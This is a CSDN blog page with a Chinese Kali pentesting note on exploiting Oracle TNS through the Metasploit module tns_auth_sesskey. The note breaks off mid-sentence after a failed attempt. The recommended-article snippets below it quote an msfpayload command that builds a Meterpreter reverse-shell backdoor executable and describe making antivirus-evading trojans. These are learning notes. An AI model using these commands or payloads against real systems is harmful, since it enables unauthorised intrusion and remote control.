kali渗透测试与教学笔记8

最新推荐文章于 2021-04-04 03:11:13 发布
最新推荐文章于 2021-04-04 03:11:13 发布
阅读量244 收藏
点赞数
分类专栏: kali 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lm19770429/article/details/105724710
版权

第三方网路服务渗透攻击实战:Oracle数据库

提示可以在网上找到很多常用网络端口对照表,作为平时的积累

oracle:tcp1521

mysql:3306

msf的exploit路径:/usr/share/metasploit-framework/modules/exploits/windows/oracle/tns_auth_sesskey.rb

攻击过程:

use exploit/windows/oracle/tns_auth_sesskey

通过show options设置如下:

set targets 0 :我用的targets,让其自动探测

exploit

但是会不成功

在exploit,还是错,但提示比变了,说明有效果

经验:渗透不成功。往往是因为与目标版本不一致的原因

通过分析,不是版本问题,而是:

 

花纵酒
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
大学霸Kali安全渗透教程.zip
06-28
大学霸Kali安全渗透教程.zip
我的渗透笔记kali基本操作
xf555er的博客
03-12 931
一、虚拟机安装VMtools 1、安装vmtools软件 2、文件解压,用到tar zvxf命令 3、进入解压后的文件夹,然后运行安装文件,安装一直点默认就可以了(一直按回车键) 二、kali更新源的修改 阿里的更新源: #阿里云 deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src htt...
学习笔记(10):Kali Linux渗透测试全程课与脚本语言编程系列课程-逻辑运算符
qq_42226776的博客
04-22 120
一、课程概要         本课程主要分享分享Kali Linux渗透测试全程课与脚本语言编程系列课程! 二、课程目标          本课程致力于帮助广大学员掌握Kali Linux渗透测试与编程技巧! 三、适合人员 ...
KALI LINUX渗透测试学习笔记
Sumarua的博客
06-19 3898
KALI LINUX渗透测试学习笔记 (苑房弘主讲) 第1章 课程介绍 任务1:Kali Linux渗透测试介绍.exe 安全问题的根源: 分层思想 只求功能实现 最大的威胁是人 渗透测试: 尝试挫败安全防御机制,发现系统安全弱点; 从攻击者的角度思考,测量安全防护的有效性; 证明安全问题的存在,而非破坏; 渗透测试标准:PTES 渗透测试的误区:扫描就是一切,忽略业务逻辑层的漏洞。 KALI,印度教中的一个重要的女神。湿婆神妃帕尔瓦蒂的化身,是印度教派中最为隐晦的一派。 KALI Linux介绍 基于De
Kali进行web渗透笔记(一)
小勇的博客
06-12 1379
Insider attacks are more lethal than the one achieved by an external entity,so sometimes Black box testing would be a waste of money and time . Career as a penetration tester is not a sprint,it is a ma
Kali渗透测试技术实战
07-24
硬盘最小120G,尤其是在密码破解、取证和做渗透测试项目的情况下,要求获得控制权限,大量生成数据、收集证据、生成日志和报告。 第三章 软件、补丁和升级 第四章 配置 kali 第五章渗透测试实验环境 第六章渗透测试...
Kali 渗透测试 pdf
04-08
Kali 渗透测试 pdf
Kali Linux渗透测试技术详解
最新发布
02-19
Kali Linux渗透测试技术详解本书由浅入深地介绍了Kali Linux的各种渗透测试技术。书中选取了最核心和最基础的内容进行讲解,让读者能够掌握渗透测试的流程,而不会被高难度的内容所淹没。本书涉及面广,从基本的知识...
KALi 渗透测试
09-13
通过kali系统详细的介绍渗透测试过程,通过工具渗透,带来渗透测试思路
基于Kali Linux的渗透测试.pdf
09-06
渗透测试的方法有很多,在行业内被广泛采纳的有:ISSAF(信息系统安全评估架构)、NIST800-115(信息安全测试与评估技术指南)、OWASP(开放式 WEB 应用安全)、PTES(渗透测试执行标准)、OSSTMM(开源安全测试方法...
kali渗透测试教学笔记7:
lm19770429的专栏
04-23 322
windows服务渗透攻击实战——MS08-067安全漏洞
kali数据库渗透_Kali Linux渗透测试实战 1.4 小试牛刀
weixin_39628256的博客
12-21 960
目录1.4小试牛刀本节作为第一章的最后一节,给大家展示一个渗透测试的简单示例。该示例操作简单,环境真实,主要是为了给您一个整体上的感知,同时提升学习渗透测试的兴趣。渗透测试的每一步并没有记录完整的细节信息。首先,我选择了一个测试站点,下面对该站点,下面对其进行渗透测试。1.4.1信息搜集whois查询结果如下:服务指纹识别很多个人站点,都没有自定义错误信息的习惯。在url上随便输入一个不存在的地址...
oracle logon只有3项,Oracle登录协议(O3LOGON)在10g
weixin_40007804的博客
04-04 136
我一直在研究Oracle针对10g数据库进行身份验证的机制.虽然它没有9i版本的文档记录,但我仍然设法在各种网站和博客上找到它的许多细节.然而,一件作品仍然是个谜.在我提到遗漏的内容之前,让我解释伪代码中有关协议的知识:// CLIENT SIDE PSEUDO CODEuser = "SCOTT"password = "TIGER"password_hash = oracle_password_...
kali漏洞利用之Meterpreter介绍
The__Apollo的博客
04-22 3800
使用示例:1.生成Meterpreter后门命令语句如下,如果其中的IP为kali攻击机的IP地址,后面跟着的是参数。msfpayload windows/meterpreter/reverse_tcp LHOST=222.28.136.223 LPORT=2333 R|msfencode -t exe -c 5 > /root/door.exe  这个语句中,如果不知道参数是什么,可以在metas
利用kali Linux使用meterpreter制作免杀木马测试入侵windows电脑
WuHao的博客
10-26 5637
前言:常规使用meterpreter制作木马时会被各大杀毒软件所拦截,固本文介绍一下利用meterpreter下的Venom制作免杀木马。 首先安装Venom Venon克隆地址:https://github.com/r00t-3xp10it/venom tar.gz OR zip OR git clone 2.赋予文件可执行权限: cd venom-main sudo chmod -R +x *.sh 3.安装依赖关系包: cd aux sudo ./setup.sh 4.运行 sudo.
Kali Linux渗透测试——WEB渗透(二)
Captain_RB的博客
01-21 9467
Kali Linux渗透测试——WEB渗透(二) 笔记内容参考安全牛课堂苑房弘老师的Kali Linux渗透测试教程 文章目录Kali Linux渗透测试——WEB渗透(二)漏洞挖掘1.目录遍历/文件包含2.文件上传3.SQL注入4.XSS(Cross-Site Scripting)5.CSRF(Cross Site Request Forgery)6.WebShell7.HTTPS攻击8.P...
抓包oracle密码,Oracle TNS 协议抓包分析
weixin_35651995的博客
04-03 1047
TNS 协议传输可以使用 TCP/IP 协议、使用 SSL 的 TCP/IP 协议、命名管道和 IPC 协议传输,其中 TCP/IP 协议传输是使 用明文传送。这里只分析基于 TCP/IP 协议上的 TNS 数据。简介TNS(Transparent Network Substrate) 协议用于客户端连接Oracle数据库,它可以使用其他一些协议进行通信,如:TCP/IP, IPX/SPX, IP...
《Metasploit训练营》中对oracle渗透测试的问题
cbhjerry的博客
07-16 441
《Metasploit训练营》书中对win2003上的oracle数据库进行渗透测试,起初按书中的方法对脚本进行修改但不能成功,到网上搜索原因,发现很多人都反映有问题。考虑到采用的是SEH内存溢出的方法,必然要构造异常,所以如下图多修改了一个地方对书中有处修改存在异议,及修改跳转地址为何要0x20,按常规来讲,相对跳转距离=目标地址-当前地址-跳转指令长度,即两条指令的地址差-跳转指令长度,地址差...
Kali-linux渗透攻击应用
weixin_34138377的博客
04-18 3304
前面依次介绍了Armitage、MSFCONSOLE和MSFCLI接口的概念及使用。本节将介绍使用MSFCONSOLE工具渗透攻击MySQL数据库服务、PostgreSQL数据库服务、Tomcat服务和PDF文件等。 6.4.1 渗透攻击MySQL数据库服务 MySQL是一个关系型数据库管理系统,由瑞典MySQL AB公司开发,目前属于Oracle公司。在Metasploitable系统中...
kali渗透测试实验
09-19
Kali Linux是一个专门用于渗透测试和网络安全的操作系统。搭建Kali Linux作为渗透测试实验平台是学习渗透测试的一种最佳方式之一。你可以使用虚拟化技术,如VMware Workstation,在电脑中模拟一个计算机环境,然后在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值